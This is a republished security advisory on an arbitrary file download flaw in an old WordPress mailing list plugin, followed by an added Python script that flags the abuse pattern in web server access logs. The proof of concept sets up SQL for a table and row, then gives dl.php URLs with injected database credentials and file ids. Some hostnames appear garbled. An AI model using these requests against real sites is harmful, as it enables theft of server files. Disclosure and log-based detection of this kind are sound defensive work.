
WordPress plugin Mailing List arbitrary file download - Website Security

 

Title: Mailing List plugin for WordPress Arbitrary file download

Affected versions: < 1.4.2

Author: 6Scan (http://6scan测试数据) security team

Download URL: http://wordpress.org/extend/plugins/mailz/

Vendor fix: This advisory is released after the vendor (http://HdhCmsTestzingiri测试数据) was contacted and fixed the issue promptly.

Overview:

Unauthorized users can download arbitrary files from the server using this exploit. 

 

The flaw is in the config.php file, which connects to a database using caller-supplied credentials. Rows from that database are then used to decide which files are read from the host, so whoever controls the database controls which files are served.

 

#   The bug is in config.php, but it is reachable through another file (lists/dl.php).

Proof of concept

 

1) Set up a MySQL database

 

2) Create a table with the following structure:

CREATE TABLE IF NOT EXISTS `phplist_attachment` (
  `filename` varchar(1024) NOT NULL,
  `mimetype` varchar(1024) NOT NULL,
  `remotefile` varchar(1024) NOT NULL,
  `description` varchar(1024) NOT NULL,
  `size` int(11) NOT NULL,
  `id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

3) Add this row to the database:

INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
('somefile.txt', '', '', '', 0, 0);

4) Call the script with the database parameters and the id of the file to download:

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0 

The credentials are now stored in the session, so they do not need to be passed on subsequent requests:

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?id=1 

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?id=2 

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?id=3
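The attack flow above leaves a distinctive trace in the web server's access log: a request to lists/dl.php that carries database-connection parameters (wph, wpdb, user, wpp), followed by id-only download requests from the same client once the credentials sit in the session. The following script, added here as an example and not part of the advisory or the plugin, scans combined-format access log lines for both patterns. The log lines, IP addresses and timestamps are constructed for the example; the path and parameter names are the ones the advisory shows.

```python
"""Flag dl.php requests that match the mailz arbitrary-download abuse pattern.

Rule 1: any request to the plugin's dl.php carrying DB connection parameters.
Rule 2: any later id-only dl.php request from a client that already sent
        credentials (the advisory notes they persist in the PHP session).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Path taken from the advisory's proof-of-concept URLs.
DL_PATH = "/wp-content/plugins/mailz/lists/dl.php"
# Query parameters the advisory uses to point dl.php at another database.
CRED_PARAMS = {"wph", "wpdb", "user", "wpp"}

# Apache/nginx "combined" style: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Split one access-log line into fields; return None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep the first value of each query parameter
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def scan(lines):
    """Return (ip, reason, target) findings for every suspicious dl.php request."""
    findings = []
    primed = set()  # clients that have already injected DB credentials
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != DL_PATH:
            continue
        supplied = CRED_PARAMS & set(rec["query"])
        if supplied:
            primed.add(rec["ip"])
            reason = "db-credentials-in-query:" + ",".join(sorted(supplied))
            findings.append((rec["ip"], reason, rec["target"]))
        elif rec["ip"] in primed and "id" in rec["query"]:
            findings.append((rec["ip"], "download-after-credential-injection", rec["target"]))
    return findings


# Constructed sample log (documentation-range IPs, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2012:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Mar/2012:12:00:05 +0000] "GET /wp-content/plugins/mailz/lists/dl.php'
    '?wph=203.0.113.99&wpdb=test&user=root&wpp=root&id=0 HTTP/1.1" 200 38',
    '203.0.113.5 - - [10/Mar/2012:12:00:09 +0000] "GET /wp-content/plugins/mailz/lists/dl.php?id=1 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Mar/2012:12:01:00 +0000] "GET /wp-content/plugins/mailz/lists/dl.php?id=7 HTTP/1.1" 200 1024',
    '203.0.113.5 - - [10/Mar/2012:12:01:12 +0000] "GET /wp-content/plugins/mailz/lists/dl.php?id=2 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, reason, target in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{target}")
```

Rule 2 deliberately ignores id-only requests from clients that never sent credentials (the 198.51.100.7 line), since those look like ordinary attachment downloads; on a site running a version below 1.4.2 the Rule 1 hits alone are enough to justify rotating the WordPress database credentials and checking which files were served.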
